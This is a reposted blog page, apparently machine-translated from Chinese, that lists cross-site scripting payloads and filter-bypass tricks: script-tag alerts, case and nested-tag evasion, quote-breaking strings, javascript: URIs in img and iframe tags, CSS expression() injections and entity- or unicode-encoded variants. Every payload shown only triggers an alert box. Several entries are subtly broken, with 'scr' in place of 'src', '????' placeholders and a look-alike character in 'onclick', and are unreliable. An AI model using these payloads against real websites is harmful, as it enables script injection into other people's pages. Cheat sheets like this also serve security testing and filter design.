当前位置：网站首页>XSS collect common code

XSS collect common code

2022-07-25 22:26:00 【Chang Jiazhuang】

The longest used must be ：

<script>alert("xss")</script>

DOM Type general use

<a href='#' onclick="alert(1111)">Click to see?</a>

Case around

'"><sCrIpT>alert(63252)</sCrIpT>

Filter script Bypass

<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>

htmlentities() No filter single quotation marks , Directly use single quotation marks to bypass

';alert('xss');'

structure js Bypass

</script><script>alert('xss')</script>

Other code collected

<img scr=javascript:alert("xss")></img>

http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<IFRAME SRC=javascript:alert('test')></IFRAME>

" οnclick="alert(1)"

<img scr="javascrip&#116&#58 alert(/xss/)></img>

(? use tab Key out of the space ）
<img scr="javas????cript:alert(/xss/)" width=150></img> 

<img scr="#" onerror=alert(/xss/)></img>

<img scr="#" style="xss:expression(alert(/xss/));"></img>

(/**/  Notation ）
<img scr="#"/* */onerror=alert(/xss/) width=150></img> 

<img src=vbscript:msgbox ("xss")></img>

<style> input {
    left:expression (alert('xss'))}</style>

<div style={
    left:expression (alert('xss'))}></div>

<div style={
    left:exp/* */ression (alert('xss'))}></div>

<div style={
    left:\0065\0078ression (alert('xss'))}></div>

html  Entity  <div style={
    left:&#ｘ0065;xpression (alert('xss'))}></div>

unicode <div style="{left:expRessioN (alert('xss'))}">

Update from time to time during collection ……

原网站

版权声明
本文为[Chang Jiazhuang]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/206/202207252221321371.html

当前位置：网站首页>XSS collect common code

XSS collect common code

Update from time to time during collection ……

边栏推荐

猜你喜欢

随机推荐